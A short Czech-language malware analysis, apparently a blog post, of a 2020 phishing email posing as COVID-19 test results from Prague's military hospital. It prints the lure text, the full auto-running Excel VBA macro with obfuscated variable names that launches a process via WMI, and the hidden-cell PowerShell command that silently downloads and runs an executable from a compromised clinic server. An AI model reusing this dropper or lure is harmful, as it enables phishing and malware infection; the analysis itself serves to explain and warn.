Email zaslany uzivateli, odkaz presmerovan na polikliniku Tachov na excelovy soubor.
1
2
3
4
5
6
7
8
9
10
11
12
13
Von:	"VFN" <Tato e-mailová adresa je chráněna před spamboty. Pro její zobrazení musíte mít povolen Javascript.>
An:	Tato e-mailová adresa je chráněna před spamboty. Pro její zobrazení musíte mít povolen Javascript.
Datum:	26.10.2020 02:34
Betreff:	Výsledky testů č. 2910-211
 
Dobrý den,
 
v odkazu níže naleznete výsledky svých testů na CoVid-19 z naší laboratoře.
Výsledky: https://vfn.cz/laborator/vysledky-online/e939rd12313
 
Tento email byl vygenerován automatickým systémem, neodpovídejte na něj prosím.
Vojenská fakultní nemocnice Praha.
Určeno pro: Tato e-mailová adresa je chráněna před spamboty. Pro její zobrazení musíte mít povolen Javascript. Datum odeslání: 10/25/2020 11:07:36 pm 

Makrem jsou nacteny prikazy z bunek v Excelu, na pozadi je stazen novy soubor s virem a nasledne spusten v pocitaci. Jedna se jednoduchy zpusob, kdy si uzivatel stahne zavirovany soubor do pocitace sam.

Prikazem Workbook_Open()" je spusteno makro automaticky po otevreni souboru v Excelu
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Private Sub Workbook_Open()
Range("A1:J22").Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
gftmfltpedmmmalshcqxsndrignapvopsgsolkaw = Range("A8").Value
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set mwzlxrhxfvlttocscceyxszjpxugixhxbukworur  = CreateObject(Range("A9").Value)
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim xdiydesrblamreokyebyuewfhgleojduyqoswjlv
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
xdiydesrblamreokyebyuewfhgleojduyqoswjlv = mwzlxrhxfvlttocscceyxszjpxugixhxbukworur.Create(gftmfltpedmmmalshcqxsndrignapvopsgsolkaw)
End Sub

Prikazy v skrytych bunkach v Excelu
1
2
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass  -command " & { iwr http://www.poltc.cz/zackova/thiss.exe -OutFile C:\Users\Public\Downloads\lrozf.exe}; & {Start-Process -FilePath "C:\Users\Public\Downloads\lrozf.exe"}"
winmgmts:win32_Process


Co virus dela, nevim. V analyzy zdroje byl soubor ze serveru polikliniky Tachov smazan.